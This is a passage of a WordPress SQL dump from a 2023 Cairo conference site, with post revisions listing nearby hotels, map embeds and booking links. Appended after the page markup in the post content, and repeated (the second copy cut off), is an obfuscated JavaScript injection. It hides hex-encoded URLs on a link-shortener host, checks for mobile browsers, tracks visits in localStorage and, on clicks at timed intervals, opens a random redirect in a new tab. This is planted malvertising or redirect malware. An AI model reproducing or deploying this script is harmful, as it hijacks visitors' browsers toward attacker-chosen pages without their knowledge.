color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:13:55','2023-07-18 23:13:55','',2685,'https://gsw2023.com/?p=5027',0,'revision','',0),
(5028,1,'2023-07-18 23:15:57','2023-07-18 23:15:57','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 